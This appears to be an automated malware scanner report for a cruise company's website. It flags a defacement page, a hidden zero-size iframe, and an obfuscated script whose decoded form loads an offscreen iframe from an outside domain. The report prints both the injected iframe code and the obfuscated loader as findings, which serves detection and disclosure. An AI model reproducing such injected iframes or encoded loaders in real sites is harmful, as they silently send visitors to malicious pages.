New scan:

Malware Scanner report for coasttocoastcruises.com

Malicious/Suspicious/Total urls checked
0/1/5
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by 910w!n9 - f!r3  (3 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://coasttocoastcruises.com/
200 OK
Content-Length: 6315
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     
src: http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf

<iframe width="0" height="0" src="http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf" frameborder="0" allowfullscreen="">

Deface/Content modification. The following signature was found: Hacked by 910w!n9 - f!r3

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="Keywords" content="Hacked by 910w!n9 - f!r3">
<title>HackeD by 910w!n9 - f!r3</title>
<link rel="shortcut icon" href="http://www.sherv.net/cm/emo/funny/2/big-dancing-banana-smiley-emoticon.gif">
<style type="text/css">
body{background: url(http://w4dve.bmcwest.net/Space.gif);}
.name { text-decoration: none;}
@-moz-keyframes roll { 100% { -moz-transform: rotate(1440deg); } }
@-o-keyframes roll { 100% { -o-tra
...[7093 bytes skipped]...


http://coasttocoastcruises.com/test404page.js
404 Not Found
Content-Length: 11836
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var a1d1351=[949,1009,1049,1054,1067,981,1064,1065,1070,1057,1050,1010,983,1061,1060,1064,1054,1065,1054,1060,1059,1007,981,1046,1047,1064,1060,1057,1066,1065,1050,1008,981,1057,1050,1051,1065,1007,994,998,997,997,986,1008,981,1065,1060,1061,1007,997,986,1008,981,1068,1054,1049,1065,1053,1007,998,997,997,986,1008,981,1053,1050,1054,1052,1053,1065,1007,998,997,997,986,1008,983,1011,1009,1064,1048,1063,1054,1061,1065,1011,1067,1046,1063,981,1054,1010
...[1268 bytes skipped]...

Decoded script:


<div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">var i=0;function doo(o){if(i==1)return;o.src="http://aaawqazxedupokerffa.gq/Rl0QSldIU1cAQRNVSE4EUhdEXV0ERARSUxgGRw.html";i=1;return;}<iframe onload="return doo(this);" style="width:50%;height:50%;" src="about:blank"></iframe></div>

http://cccruises.com/wp-content/plugins/jquery-updater/js/jquery-2.1.4.min.js
200 OK
Content-Length: 84345
Content-Type: application/javascript
clean
http://cccruises.com/wp-content/plugins/jquery-updater/js/jquery-migrate-1.2.1.min.js
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://cccruises.com/wp-content/themes/twentyfourteen/js/functions.js
200 OK
Content-Length: 4529
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: coasttocoastcruises.com

Result:
HTTP/1.1 200 OK
Date: Thu, 16 Jul 2015 17:26:16 GMT
Accept-Ranges: bytes
ETag: "0f3d1d4daed01:0"
Server: Microsoft-IIS/8.5
Content-Length: 6315
Content-Type: text/html
Last-Modified: Wed, 24 Jun 2015 07:12:22 GMT
X-Powered-By: ASP.NET

...6315 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: coasttocoastcruises.com
Referer: http://www.google.com/search?q=coasttocoastcruises.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=coasttocoastcruises.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://coasttocoastcruises.com/

Result: coasttocoastcruises.com is not infected or malware details are not published yet.